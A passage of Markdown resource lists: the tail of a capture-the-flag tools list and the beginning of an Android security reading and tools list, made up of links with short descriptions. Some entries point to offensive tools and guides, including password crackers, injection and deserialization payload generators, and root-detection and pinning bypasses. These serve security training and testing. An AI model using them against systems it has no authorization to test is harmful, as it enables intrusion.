[MZCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html) - Small utility that reads the cache folder of Firefox/Mozilla/Netscape Web browsers, and displays the list of all files currently stored in the cache. - [NetworkMiner](https://www.netresec.com/index.ashx?page=NetworkMiner) Network Forensic Analysis Tool (NFAT). - [OfflineRegistryView](https://www.nirsoft.net/utils/offline_registry_view.html) - Simple tool for Windows that allows you to read offline Registry files from external drive. - [photorec](https://www.cgsecurity.org/wiki/PhotoRec) - File data recovery software designed to recover lost files including video, documents and archives from hard disks, CD-ROMs, and lost pictures (thus the Photo Recovery name) from digital camera memory. - [Registry Viewer](https://accessdata.com/product-download/registry-viewer-2-0-0) - Tool to view Windows registers. - [Scalpel](https://github.com/sleuthkit/scalpel) - Open source data carving tool. - [USBRip](https://github.com/snovvcrash/usbrip) - Simple CLI forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux. - [Volatility](https://github.com/volatilityfoundation/volatility) - An advanced memory forensics framework. - [Wireshark](https://www.wireshark.org/) - Tool to analyze pcap or pcapng files. - [X-Ways](https://www.x-ways.net/forensics/index-m.html) - Advanced work environment for computer forensic examiners. ## Misc *Tools used for solving Misc challenges* - [boofuzz](https://github.com/jtpereyda/boofuzz) - Network Protocol Fuzzing for Humans. - [Veles](https://codisec.com/veles/) - Binary data analysis and visualization tool. **Bruteforcers:** - [changeme](https://github.com/ztgrace/changeme) - A default credential scanner. - [Hashcat](https://hashcat.net/hashcat/) - Advanced Password Recovery. - [Hydra](https://www.kali.org/tools/hydra/) - Parallelized login cracker which supports numerous protocols to attack. - [John the Ripper](https://www.openwall.com/john/) - Open Source password security auditing and password recovery. - [jwt_tool](https://github.com/ticarpi/jwt_tool) - A toolkit for testing, tweaking and cracking JSON Web Tokens. - [Ophcrack](https://ophcrack.sourceforge.io/) - Free Windows password cracker based on rainbow tables. - [Patator](https://github.com/lanjelot/patator) - Multi-purpose brute-forcer, with a modular design and a flexible usage. - [Turbo Intruder](https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988) - Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. **Esoteric Languages:** - [Brainfuck](https://copy.sh/brainfuck/) - Brainfuck esoteric programming language IDE. - [COW](https://frank-buss.de/cow.html) - It is a Brainfuck variant designed humorously with Bovinae in mind. - [Malbolge](http://www.malbolge.doleczek.pl/) - Malbolge esoteric programming language solver. - [Ook!](https://www.dcode.fr/ook-language) - Tool for decoding / encoding in Ook! - [Piet](https://www.bertnase.de/npiet/npiet-execute.php) - Piet programming language compiler. - [Rockstar](https://codewithrockstar.com/online) - A language intended to look like song lyrics. - [Try It Online](https://tio.run/) - An online tool that has a ton of Esoteric language interpreters. **Sandboxes:** - [Any.run](https://any.run/) - Interactive malware hunting service. - [Intezer Analyze](https://analyze.intezer.com/) - Malware analysis platform. - [Triage](https://tria.ge/) - State-of-the-art malware analysis sandbox designed for cross-platform support. ## Reversing *Tools used for solving Reversing challenges* - [Androguard](https://github.com/androguard/androguard) - Androguard is a full python tool to play with Android files. - [Angr](https://github.com/angr/angr) - A powerful and user-friendly binary analysis platform. - [Apk2gold](https://github.com/lxdvs/apk2gold) - CLI tool for decompiling Android apps to Java. - [ApkTool](https://ibotpeaches.github.io/Apktool/) - A tool for reverse engineering 3rd party, closed, binary Android apps. - [Binary Ninja](https://binary.ninja/) - Binary Analysis Framework. - [BinUtils](https://www.gnu.org/software/binutils/binutils.html) - Collection of binary tools. - [CTF_import](https://github.com/sciencemanx/ctf_import) - Run basic functions from stripped binaries cross platform. - [Compiler Explorer](https://godbolt.org/) - Online compiler tool. - [CWE_checker](https://github.com/fkie-cad/cwe_checker) - Finds vulnerable patterns in binary executables. - [Demovfuscator](https://github.com/kirschju/demovfuscator) - A work-in-progress deobfuscator for movfuscated binaries. - [Disassembler.io](https://onlinedisassembler.com/static/home/index.html) - Disassemble On Demand. A lightweight, online service for when you don’t have the time, resources, or requirements to use a heavier-weight alternative. - [dnSpy](https://github.com/dnSpy/dnSpy) - .NET debugger and assembly editor. - [EasyPythonDecompiler](https://sourceforge.net/projects/easypythondecompiler/) - A small .exe GUI application that will "decompile" Python bytecode, often seen in .pyc extension. - [Frida](https://github.com/frida/) - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. - [GDB](https://www.gnu.org/software/gdb/) - The GNU Project debugger. - [GEF](https://github.com/hugsy/gef) - A modern experience for GDB with advanced debugging features for exploit developers & reverse engineers. - [Ghidra](https://ghidra-sre.org/) - A software reverse engineering (SRE) suite of tools developed by NSA. - [Hopper](https://www.hopperapp.com/) - Reverse engineering tool (disassembler) for OSX and Linux. - [IDA Pro](https://hex-rays.com/ida-pro/) - Most used Reversing software. - [Jadx](https://github.com/skylot/jadx) - Command line and GUI tools for producing Java source code from Android Dex and Apk files. - [Java Decompilers](http://www.javadecompilers.com/) - An online decompiler for Java and Android APKs. - [JSDetox](https://github.com/svent/jsdetox) - A JavaScript malware analysis tool. - [miasm](https://github.com/cea-sec/miasm) - Reverse engineering framework in Python. - [Objection](https://github.com/sensepost/objection) - Runtime mobile exploration. - [Online Assembler/Disassembler](http://shell-storm.org/online/Online-Assembler-and-Disassembler/) - Online wrappers around the Keystone and Capstone projects. - [PEDA](https://github.com/longld/peda) - Python Exploit Development Assistance for GDB. - [PEfile](https://github.com/erocarrera/pefile) - Python module to read and work with PE (Portable Executable) files. - [Pwndbg](https://github.com/pwndbg/pwndbg) - Exploit Development and Reverse Engineering with GDB Made Easy. - [radare2](https://github.com/radareorg/radare2) - UNIX-like reverse engineering framework and command-line toolset. - [Rizin](https://github.com/rizinorg/rizin) - Rizin is a fork of the radare2 reverse engineering framework with a focus on usability, working features and code cleanliness. - [Uncompyle](https://github.com/gstarnberger/uncompyle) - A Python 2.7 byte-code decompiler (.pyc) - [WinDBG](http://www.windbg.org/) - Windows debugger distributed by Microsoft. - [Z3](https://github.com/Z3Prover/z3) - A theorem prover from Microsoft Research. ## Steganography *Tools used for solving Stego challenges* - [AperiSolve](https://aperisolve.fr/) - Platform which performs layer analysis on images. - [BPStegano](https://github.com/TapanSoni/BPStegano) - Python3 based LSB steganography. - [DTMF Tones](http://dialabc.com/sound/detect/index.html) - Audio frequencies common to a phone button. - [Exif](http://manpages.ubuntu.com/manpages/trusty/man1/exif.1.html) - Shows EXIF information in JPEG files. - [Exiv2](https://www.exiv2.org/manpage.html) - Image metadata manipulation tool. - [hipshot](https://bitbucket.org/eliteraspberries/hipshot/src/master/) - Tool to converts a video file or series of photographs into a single image simulating a long-exposure photograph. - [Image Steganography](https://incoherency.co.uk/image-steganography/) - Client-side Javascript tool to steganographically hide/unhide images inside the lower "bits" of other images. - [ImageMagick](http://www.imagemagick.org/script/index.php) - Tool for manipulating images. - [jsteg](https://github.com/lukechampine/jsteg) - Command-line tool to use against JPEG images. - [Outguess](https://www.freebsd.org/cgi/man.cgi?query=outguess+&apropos=0&sektion=0&manpath=FreeBSD+Ports+5.1-RELEASE&format=html) - Universal steganographic tool. - [Pngcheck](http://www.libpng.org/pub/png/apps/pngcheck.html) - Verifies the integrity of PNG and dump all of the chunk-level information in human-readable form. - [Pngtools](https://packages.debian.org/sid/pngtools) - For various analysis related to PNGs. - [sigBits](https://github.com/Pulho/sigBits) - Steganography significant bits image decoder. - [SmartDeblur](https://github.com/Y-Vladimir/SmartDeblur) - Restoration of defocused and blurred photos/images. - [Snow](https://sbmlabs.com/notes/snow_whitespace_steganography_tool) - Whitespace Steganography Tool - [Sonic Visualizer](https://www.sonicvisualiser.org/) - Audio file visualization. - [Steganography Online](https://stylesuxx.github.io/steganography/) - Online steganography encoder and decoder. - [Stegbreak](https://linux.die.net/man/1/stegbreak) - Launches brute-force dictionary attacks on JPG image. - [StegCracker](https://github.com/Paradoxis/StegCracker) - Brute-force utility to uncover hidden data inside files. - [stegextract](https://github.com/evyatarmeged/stegextract) - Detect hidden files and text in images. - [Steghide](http://steghide.sourceforge.net/) - Hide data in various kinds of image- and audio-files. - [StegOnline](https://stegonline.georgeom.net/) - Conduct a wide range of image steganography operations, such as concealing/revealing files hidden within bits. - [Stegosaurus](https://github.com/AngelKitty/stegosaurus) - A steganography tool for embedding payloads within Python bytecode. - [StegoVeritas](https://github.com/bannsec/stegoVeritas) - Yet another stego tool. - [stegseek](https://github.com/RickdeJager/stegseek) - Lightning fast steghide cracker that can be used to extract hidden data from files. - [stegsnow](https://manpages.ubuntu.com/manpages/trusty/man1/stegsnow.1.html) - Whitespace steganography program. - [Stegsolve](https://github.com/zardus/ctf-tools/tree/master/stegsolve) - Apply various steganography techniques to images. - [Zsteg](https://github.com/zed-0xff/zsteg/) - PNG/BMP analysis. ## Web *Tools used for solving Web challenges* - [Arachni](https://www.arachni-scanner.com/) - Web Application Security Scanner Framework. - [Beautifier.io](https://beautifier.io/) - Online JavaScript Beautifier. - [BurpSuite](https://portswigger.net/burp) - A graphical tool to testing website security. - [Commix](https://github.com/commixproject/commix) - Automated All-in-One OS Command Injection Exploitation Tool. - [debugHunter](https://github.com/devploit/debugHunter) - Discover hidden debugging parameters and uncover web application secrets. - [Dirhunt](https://github.com/Nekmo/dirhunt) - Find web directories without bruteforce. - [dirsearch](https://github.com/maurosoria/dirsearch) - Web path scanner. - [dontgo403](https://github.com/devploit/dontgo403) - Tool to bypass 40x errors. - [ffuf](https://github.com/ffuf/ffuf) - Fast web fuzzer written in Go. - [git-dumper](https://github.com/arthaud/git-dumper) - A tool to dump a git repository from a website. - [Gopherus](https://github.com/tarunkant/Gopherus) - Tool that generates gopher link for exploiting SSRF and gaining RCE in various servers. - [Hookbin](https://hookbin.com/) - Free service that enables you to collect, parse, and view HTTP requests. - [JSFiddle](https://jsfiddle.net/) - Test your JavaScript, CSS, HTML or CoffeeScript online with JSFiddle code editor. - [ngrok](https://ngrok.com/) - Secure introspectable tunnels to localhost. - [OWASP Zap](https://owasp.org/www-project-zap/) - Intercepting proxy to replay, debug, and fuzz HTTP requests and responses. - [PHPGGC](https://github.com/ambionics/phpggc) - Library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically. - [Postman](https://chrome.google.com/webstore/detail/postman/fhbjgbiflinjbdggehcddcbncdddomop?hl=en) - Addon for chrome for debugging network requests. - [REQBIN](https://reqbin.com/) - Online REST & SOAP API Testing Tool. - [Request Bin](https://requestbin.com/) - A modern request bin to inspect any event by Pipedream. - [Revelo](http://www.kahusecurity.com/posts/revelo_javascript_deobfuscator.html) - Analyze obfuscated Javascript code. - [Smuggler](https://github.com/defparam/smuggler) - An HTTP Request Smuggling / Desync testing tool written in Python3. - [SQLMap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool. - [W3af](https://github.com/andresriancho/w3af) - Web application attack and audit framework. - [XSSer](https://xsser.03c8.net/) - Automated XSS testor. - [ysoserial](https://github.com/frohoff/ysoserial) - Tool for generating payloads that exploit unsafe Java object deserialization. # 0x02. Resources ## Online Platforms *Always online CTFs* - [247CTF](https://247ctf.com/) - Free Capture The Flag Hacking Environment. - [Atenea](https://atenea.ccn-cert.cni.es/) - Spanish CCN-CERT CTF platform. - [CTFlearn](https://ctflearn.com/) - Online platform built to help ethical hackers learn, practice, and compete. - [CTF365](https://ctf365.com/) - Security Training Platform - [Crackmes.One](https://crackmes.one/) - Reverse Engineering Challenges. - [CryptoHack](https://cryptohack.org/) - Cryptography Challenges. - [Cryptopals](https://cryptopals.com/) - Cryptography Challenges. - [echoCTF.RED](https://echoctf.red/) - Online Hacking Laboratories. - [Hacker101](https://www.hacker101.com/) - CTF Platform by [HackerOne](https://www.hackerone.com/). - [HackTheBox](https://www.hackthebox.com/) - A Massive Hacking Playground. - [HackThisSite](https://www.hackthissite.org/) - Free, safe and legal training ground for hackers. - [MicroCorruption](https://microcorruption.com/) - Embedded Security CTF. - [OverTheWire](https://overthewire.org/wargames/) - Wargame offered by the OverTheWire community. - [picoCTF](https://picoctf.org/) - Beginner-friendly CTF platform. - [Pwnable.kr](http://pwnable.kr/) - Pwn/Exploiting platform. - [Pwnable.tw](https://pwnable.tw/) - Pwn/Exploiting platform. - [Pwnable.xyz](https://pwnable.xyz/) - Pwn/Exploiting platform. - [PWNChallenge](http://pwn.eonew.cn/) - Pwn/Exploiting platform. - [Reversing.kr](http://reversing.kr/) - Reverse Engineering platform. - [Root-me](https://www.root-me.org/) - CTF training platform. - [VibloCTF](https://ctf.viblo.asia/landing) - CTF training platform. - [VulnHub](https://www.vulnhub.com/) - VM-based pentesting platform. - [W3Challs](https://w3challs.com/) - Hacking/CTF platform. - [WebHacking](https://webhacking.kr/) - Web challenges platform. - [Websec.fr](http://websec.fr/) - Web challenges platform. - [WeChall](https://www.wechall.net/active_sites) - Challenge sites directory & forum *Self-hosted CTFs* - [Damn Vulnerable Web Application](https://dvwa.co.uk/) - PHP/MySQL web application that is damn vulnerable. - [Juice Shop](https://github.com/juice-shop/juice-shop-ctf) - Capture-the-Flag (CTF) environment setup tools for OWASP Juice Shop. ## Collaborative Tools - [CTFNote](https://github.com/TFNS/CTFNote) - Collaborative tool aiming to help CTF teams to organise their work. ## Writeups Repositories *Repository of CTF Writeups* - [Courgettes.Club](https://ctf.courgettes.club/) - CTF Writeup Finder. - [CTFtime](https://ctftime.org/writeups) - CTFtime Writeups Collection. - [Github.com/CTFs](https://github.com/ctfs) - Collection of CTF Writeups. ## Courses - [Roppers Bootcamp](https://www.roppers.org/courses/ctf) - CTF Bootcamp. # 0x03. Bibliography *The resources presented here have been gathered from numerous sources. However, the most important are:* - [apsdehal_awesome-ctf](https://github.com/apsdehal/awesome-ctf) - [vavkamil_awesome-bugbounty-tools](https://github.com/vavkamil/awesome-bugbounty-tools) - [zardus_ctf-tools](https://github.com/zardus/ctf-tools)
# Awesome-Android-Security ![awesome](https://awesome.re/badge.svg) ![Screenshot](img/androidsec.png) # Table of Contents - [Blog](#blog) - [How To's](#how-tos) - [Papers](#paper) - [Books](#books) - [Trainings](#Trainings) - [Tools](#tools) * [Static Analysis Tools](#Static-Analysis) * [Dynamic Analysis Tools](#Dynamic-Analysis) * [Online APK Analyzers](#Online-APK-Analyzers) * [Online APK Decompiler](#Online-APK-Decompiler) * [Forensic Analysis Tools](#Forensic-Analysis) - [Labs](#labs) - [Talks](#talks) - [Misc](#misc) - [Bug Bounty & Writeups](#Bug-Bounty-&-Writeup) - [Cheat Sheet](#Cheat-Sheet) - [Checklist](#Checklist) - [Bug Bounty Report](#Bug-Bounty-Report) # Blogs * [Bypass Instagram and Threads SSL pinning on Android](https://github.com/Eltion/Instagram-SSL-Pinning-Bypass) * [Reverse Engineering Android game Coin Hunt World and its communication protocol to cheat the app](https://research.nccgroup.com/2023/05/31/reverse-engineering-coin-hunt-worlds-binary-protocol/) * [Discovering vendor-specific vulnerabilities in Android](https://blog.oversecured.com/Discovering-vendor-specific-vulnerabilities-in-Android/) * [Technical analysis of Alien android malware](https://muha2xmad.github.io/malware-analysis/alien/) * [Lock Screen Bypass Exploit of Android Devices (CVE-2022–20006)](https://medium.com/maverislabs/lock-screen-bypass-exploit-of-android-devices-cve-2022-20006-604958fcee3a) * [Analysis of Android banking Trojan MaliBot that is based on S.O.V.A banker](https://www.f5.com/labs/articles/threat-intelligence/f5-labs-investigates-malibot) * [Pending Intents: A Pentester’s view](https://valsamaras.medium.com/pending-intents-a-pentesters-view-92f305960f03) * [Android security checklist: theft of arbitrary files](https://blog.oversecured.com/Android-security-checklist-theft-of-arbitrary-files/) * [Protecting Android users from 0-Day attacks](https://blog.google/threat-analysis-group/protecting-android-users-from-0-day-attacks/) * [Reversing an Android sample which uses Flutter](https://cryptax.medium.com/reversing-an-android-sample-which-uses-flutter-23c3ff04b847) * [Step-by-step guide to reverse an APK protected with DexGuard using Jadx](https://blog.lexfo.fr/dexguard.html) * [Use cryptography in mobile apps the right way](https://blog.oversecured.com/Use-cryptography-in-mobile-apps-the-right-way/) * [Android security checklist: WebView](https://blog.oversecured.com/Android-security-checklist-webview/) * [Common mistakes when using permissions in Android](https://blog.oversecured.com/Common-mistakes-when-using-permissions-in-Android/) * [Two weeks of securing Samsung devices: Part 2](https://blog.oversecured.com/Two-weeks-of-securing-Samsung-devices-Part-2/) * [Why dynamic code loading could be dangerous for your apps: a Google example](https://blog.oversecured.com/Why-dynamic-code-loading-could-be-dangerous-for-your-apps-a-Google-example/) * [Two weeks of securing Samsung devices: Part 1](https://blog.oversecured.com/Two-weeks-of-securing-Samsung-devices-Part-1/) * [How to exploit insecure WebResourceResponse configurations + an example of the vulnerability in Amazon apps](https://blog.oversecured.com/Android-Exploring-vulnerabilities-in-WebResourceResponse) * [Exploiting memory corruption vulnerabilities on Android + an example of such vulnerability in PayPal apps](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) * [Capture all android network traffic](https://www.exandroid.dev/2021/03/21/capture-all-android-network-traffic/) * [Reverse Engineering Clubhouse](https://www.klmlabs.co/blog/club-house-observations-th5x8) * [Escape the Chromium sandbox on Android Devices](https://microsoftedge.github.io/edgevr/posts/yet-another-uaf/) * [Android Penetration Testing: Frida](https://www.hackingarticles.in/android-penetration-testing-frida/) * [Android: Gaining access to arbitrary* Content Providers](https://blog.oversecured.com/Gaining-access-to-arbitrary-Content-Providers/) * [Getting root on a 4G LTE mobile hotspot](https://alex.studer.dev/2021/01/04/mw41-1) * [Exploiting new-era of Request forgery on mobile applications](http://dphoeniixx.com/2020/12/13-2/) * [Deep Dive into an Obfuscation-as-a-Service for Android Malware](https://wwwstratosphereips.org/blog/2020/12/03/deep-dive-into-an-obfuscation-as-a-service-for-android-malware) * [Evernote: Universal-XSS, theft of all cookies from all sites, and more](https://blog.oversecured.com/Evernote-Universal-XSS-theft-of-all-cookies-from-all-sites-and-more/) * [Interception of Android implicit intents](https://blog.oversecured.com/Interception-of-Android-implicit-intents/) * [AAPG - Android application penetration testing guide](https://nightowl131.github.io/AAPG/) * [TikTok: three persistent arbitrary code executions and one theft of arbitrary files](https://blog.oversecured.com/Oversecured-detects-dangerous-vulnerabilities-in-the-TikTok-Android-app/) * [Persistent arbitrary code execution in Android's Google Play Core Library: details, explanation and the PoC - CVE-2020-8913](https://blog.oversecured.com/Oversecured-automatically-discovers-persistent-code-execution-in-the-Google-Play-Core-Library/) * [Android: Access to app protected components](https://blog.oversecured.com/Android-Access-to-app-protected-components/) * [Android: arbitrary code execution via third-party package contexts](https://blog.oversecured.com/Android-arbitrary-code-execution-via-third-party-package-contexts/) * [Android Pentesting Labs - Step by Step guide for beginners](https://medium.com/bugbountywriteup/android-pentesting-lab-4a6fe1a1d2e0) * [An Android Hacking Primer](https://medium.com/swlh/an-android-hacking-primer-3390fef4e6a0) * [An Android Security tips](https://developer.android.com/training/articles/security-tips) * [OWASP Mobile Security Testing Guide](https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide) * [Security Testing for Android Cross Platform Application](https://3xpl01tc0d3r.blogspot.com/2019/09/security-testing-for-android-app-part1.html) * [Dive deep into Android Application Security](https://blog.0daylabs.com/2019/09/18/deep-dive-into-Android-security/) * [Pentesting Android Apps Using Frida](https://www.notsosecure.com/pentesting-android-apps-using-frida/) * [Mobile Security Testing Guide](https://mobile-security.gitbook.io/mobile-security-testing-guide/) * [Android Applications Reversing 101](https://www.evilsocket.net/2017/04/27/Android-Applications-Reversing-101/#.WQND0G3TTOM.reddit) * [Android Security Guidelines](https://developer.box.com/en/guides/security/) * [Android WebView Vulnerabilities](https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/) * [OWASP Mobile Top 10](https://www.owasp.org/index.php/OWASP_Mobile_Top_10) * [Practical Android Phone Forensics](https://resources.infosecinstitute.com/practical-android-phone-forensics/) * [Mobile Pentesting With Frida](https://drive.google.com/file/d/1JccmMLi6YTnyRrp_rk6vzKrUX3oXK_Yw/view) * [Zero to Hero - Mobile Application Testing - Android Platform](https://nileshsapariya.blogspot.com/2016/11/zero-to-hero-mobile-application-testing.html) * [Detecting Dynamic Loading in Android Applications](https://sayfer.io/blog/dynamic-loading-in-android-applications-with-proc-maps/) * [Static Analysis for Android and iOS](https://pentestwiki.org/static-analysis-for-android-and-ios) * [Dynamic Analysis for Android and iOS](https://pentestwiki.org/dynamic-analysis-for-android-and-ios) * [Exploring intent-based Android security vulnerabilities on Google Play (part 1/3)](https://snyk.io/blog/exploring-android-intent-based-security-vulnerabilities-google-play/) * [Hunting intent-based Android security vulnerabilities with Snyk Code (part 2/3)](https://snyk.io/blog/hunting-intent-based-android-security-vulnerabilities-with-snyk-code/) * [Mitigating and remediating intent-based Android security vulnerabilities (part 3/3)](https://snyk.io/blog/mitigating-remediating-intent-based-android-security-vulnerabilities/) * [Strengthening Android Security: Mitigating Banking Trojan Threats](https://debugactiveprocess.medium.com/strengthening-android-security-mitigating-banking-trojan-threats-fe94ae9e2f02) # How To's * [How to analyze mobile malware: a Cabassous/FluBot Case study](https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/) * [How to Bypasses Iframe Sandboxing](https://blog.confiant.com/malvertiser-scamclub-bypasses-iframe-sandboxing-with-postmessage-shenanigans-cve-2021-1801-1c998378bfba) * [How To Configuring Burp Suite With Android Nougat](https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/) * [How To Bypassing Xamarin Certificate Pinning](https://www.gosecure.net/blog/2020/04/06/bypassing-xamarin-certificate-pinning-on-android/) * [How To Bypassing Android Anti-Emulation](https://www.juanurs.com/Bypassing-Android-Anti-Emulation-Part-I/) * [How To Secure an Android Device](https://source.android.com/security) * [Android Root Detection Bypass Using Objection and Frida Scripts](https://medium.com/@GowthamR1/android-root-detection-bypass-using-objection-and-frida-scripts-d681d30659a7) * [Root Detection Bypass By Manual Code Manipulation.](https://medium.com/@sarang6489/root-detection-bypass-by-manual-code-manipulation-5478858f4ad1) * [Magisk Systemless Root - Detection and Remediation](https://www.mobileiron.com/en/blog/magisk-android-rooting) * [How to use FRIDA to bruteforce Secure Startup with FDE-encryption on a Samsung G935F running Android 8](https://github.com/Magpol/fridafde) # Papers * [A systematic analysis of commercial Android packers](https://dl.acm.org/doi/abs/10.1145/3540250.3558969) * [A Large-Scale Study on the Adoption of Anti-Debugging and Anti-Tampering Protections in Android Apps](https://stefanoberlato.it/publications/pdf/JISA20.pdf) * [Things You May Not Know About Android (Un)Packers](https://homes.luddy.indiana.edu/xw7/papers/duan2018ndss.pdf) * [Happer: Unpacking Android Apps via a Hardware-Assisted Approach](https://ieeexplore.ieee.org/document/9519458) * [AndrODet: An adaptive Android obfuscation detector](https://arxiv.org/pdf/1910.06192.pdf) * [GEOST BOTNET - the discovery story of a new Android banking trojan](http://public.avast.com/research/VB2019-Garcia-etal.pdf) * [Dual-Level Android Malware Detection](https://www.mdpi.com/2073-8994/12/7/1128) * [An Investigation of the Android Kernel Patch Ecosystem](https://www.usenix.org/conference/usenixsecurity21/presentation/zhang) # Books * [SEI CERT Android Secure Coding Standard](https://www.securecoding.cert.org/confluence/display/android/Android+Secure+Coding+Standard) * [Android Security Internals](https://www.oreilly.com/library/view/android-security-internals/9781457185496/) * [Android Cookbook](https://androidcookbook.com/) * [Android Hacker's Handbook](https://www.amazon.com/Android-Hackers-Handbook-Joshua-Drake/dp/111860864X) * [Android Security Cookbook](https://www.packtpub.com/in/application-development/android-security-cookbook) * [The Mobile Application Hacker's Handbook](https://www.amazon.in/Mobile-Application-Hackers-Handbook-ebook/dp/B00TSA6KLG) * [Android Malware and Analysis](https://www.oreilly.com/library/view/android-malware-and/9781482252200/) * [Android Security: Attacks and Defenses](https://www.crcpress.com/Android-Security-Attacks-and-Defenses/Misra-Dubey/p/book/9780367380182) * [Learning Penetration Testing For Android Devices](https://www.amazon.com/Learning-Penetration-Testing-Android-Devices-ebook/dp/B077L7SNG8) * [Android Hacking 2020 Edition](https://www.amazon.com/Hacking-Android-TERRY-D-CLARK-ebook/dp/B08MD2D1SJ) # Trainings * [SEC575: Mobile Device Security and Ethical Hacking](https://www.sans.org/cyber-security-courses/mobile-device-security-ethical-hacking/) * [Android Reverse Engineering_pt-BR](https://www.youtube.com/watch?v=eHdDS2e_qf0&list=PL4zZ9lJ-RCbfv6f6Jc8cJ4ljKqENkTfi7) * [Learning-Android-Security](https://www.lynda.com/Android-tutorials/Learning-Android-Security/689762-2.html) * [Advanced Android Development](https://developer.android.com/courses/advanced-training/overview) * [Learn the art of mobile app development](https://www.edx.org/professional-certificate/harvardx-computer-science-and-mobile-apps) * [Learning Android Malware Analysis](https://www.linkedin.com/learning/learning-android-malware-analysis) * [Android App Reverse Engineering 101](https://maddiestone.github.io/AndroidAppRE/) * [MASPT V2](https://www.elearnsecurity.com/course/mobile_application_security_and_penetration_testing/) * [Android Pentration Testing(Persian)](https://www.youtube.com/watch?v=XqS_bA6XfNU&list=PLvVo-xqnJCI7rftDaiEtWFLXlkxN-1Nxn) # Tools #### Static Analysis * [BlackDex is an Android unpack(dexdump) tool](https://github.com/CodingGay/BlackDex) * [Deoptfuscator - Deobfuscator for Android Application](https://github.com/Gyoonus/deoptfuscator) * [Android Reverse Engineering WorkBench for VS Code](https://github.com/Surendrajat/APKLab) * [Apktool:A tool for reverse engineering Android apk files](https://ibotpeaches.github.io/Apktool/) * [Defeat Java packers via Frida instrumentation](https://github.com/enovella/fridroid-unpacker) * [quark-engine - An Obfuscation-Neglect Android Malware Scoring System](https://github.com/quark-engine/quark-engine) * [DeGuard:Statistical Deobfuscation for Android](http://apk-deguard.com/) * [jadx - Dex to Java decompiler](https://github.com/skylot/jadx/releases) * [Amandroid – A Static Analysis Framework](http://pag.arguslab.org/argus-saf) * [Androwarn – Yet Another Static Code Analyzer](https://github.com/maaaaz/androwarn/) * [Droid Hunter – Android application vulnerability analysis and Android pentest tool](https://github.com/hahwul/droid-hunter) * [Error Prone – Static Analysis Tool](https://github.com/google/error-prone) * [Findbugs – Find Bugs in Java Programs](http://findbugs.sourceforge.net/downloads.html) * [Find Security Bugs – A SpotBugs plugin for security audits of Java web applications.](https://github.com/find-sec-bugs/find-sec-bugs/) * [Flow Droid – Static Data Flow Tracker](https://github.com/secure-software-engineering/FlowDroid) * [Smali/Baksmali – Assembler/Disassembler for the dex format](https://github.com/JesusFreke/smali) * [Smali-CFGs – Smali Control Flow Graph’s](https://github.com/EugenioDelfa/Smali-CFGs) * [SPARTA – Static Program Analysis for Reliable Trusted Apps](https://www.cs.washington.edu/sparta) * [Gradle Static Analysis Plugin](https://github.com/novoda/gradle-static-analysis-plugin) * [Checkstyle – A tool for checking Java source code](https://github.com/checkstyle/checkstyle) * [PMD – An extensible multilanguage static code analyzer](https://github.com/pmd/pmd) * [Soot – A Java Optimization Framework](https://github.com/Sable/soot) * [Android Quality Starter](https://github.com/pwittchen/android-quality-starter) * [QARK – Quick Android Review Kit](https://github.com/linkedin/qark) * [Infer – A Static Analysis tool for Java, C, C++ and Objective-C](https://github.com/facebook/infer) * [Android Check – Static Code analysis plugin for Android Project](https://github.com/noveogroup/android-check) * [FindBugs-IDEA Static byte code analysis to look for bugs in Java code](https://plugins.jetbrains.com/plugin/3847-findbugs-idea) * [APK Leaks – Scanning APK file for URIs, endpoints & secrets](https://github.com/dwisiswant0/apkleaks) * [Trueseeing – fast, accurate and resillient vulnerabilities scanner for Android apps](https://github.com/monolithworks/trueseeing) * [StaCoAn – crossplatform tool which aids developers, bugbounty hunters and ethical hackers](https://github.com/vincentcox/StaCoAn) * [APKScanner](https://github.com/n3k00n3/APKScanner) * [Mobile Audit – Web application for performing Static Analysis and detecting malware in Android APKs](https://github.com/mpast/mobileAudit) * [mariana-trench - Our security focused static analysis tool for Android and Java applications.](https://github.com/facebook/mariana-trench) * [semgrep-rules-android-security](https://github.com/mindedsecurity/semgrep-rules-android-security) #### Dynamic Analysis * [Mobile-Security-Framework MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) * [Magisk v23.0 - Root & Universal Systemless Interface](https://github.com/topjohnwu/Magisk) * [Runtime Mobile Security (RMS) - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security) * [House: A runtime mobile application analysis toolkit with a Web GUI](https://github.com/nccgroup/house) * [Objection - Runtime Mobile Exploration toolkit, powered by Frida](https://github.com/sensepost/objection) * [Droid-FF - Android File Fuzzing Framework](https://github.com/antojoseph/droid-ff) * [Drozer](https://github.com/FSecureLABS/drozer) * [Slicer-automate APK Recon](https://github.com/mzfr/slicer) * [Inspeckage](https://github.com/ac-pm/Inspeckage) * [PATDroid - Collection of tools and data structures for analyzing Android applications](https://github.com/mingyuan-xia/PATDroid) * [Radare2 - Unix-like reverse engineering framework and commandline tools](https://github.com/radareorg/radare2) * [Cutter - Free and Open Source RE Platform powered by radare2](https://cutter.re/) * [ByteCodeViewer - Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger)](https://bytecodeviewer.com/) #### Online APK Analyzers * [Guardsquare AppSweep](https://www.guardsquare.com/appsweep-mobile-application-security-testing) * [Oversecured](https://oversecured.com/) * [Android Observatory APK Scan](https:/androidobservatory.org/upload) * [AndroTotal](http://andrototal.org/) * [VirusTotal](https://www.virustotal.com/#/home/upload) * [Scan Your APK](https://scanyourapk.com/) * [AVC Undroid](https://undroid.av-comparatives.org/index.php) * [OPSWAT](https://metadefender.opswat.com/#!/) * [ImmuniWeb Mobile App Scanner](https://www.htbridge.com/mobile/) * [Ostor Lab](https://www.ostorlab.co/scan/mobile/) * [Quixxi](https://quixxisecurity.com/) * [TraceDroid](http://tracedroid.few.vu.nl/submit.php) * [Visual Threat](http://www.visualthreat.com/UIupload.action) * [App Critique](https://appcritique.boozallen.com/) * [Jotti's malware scan](https://virusscan.jotti.org/) * 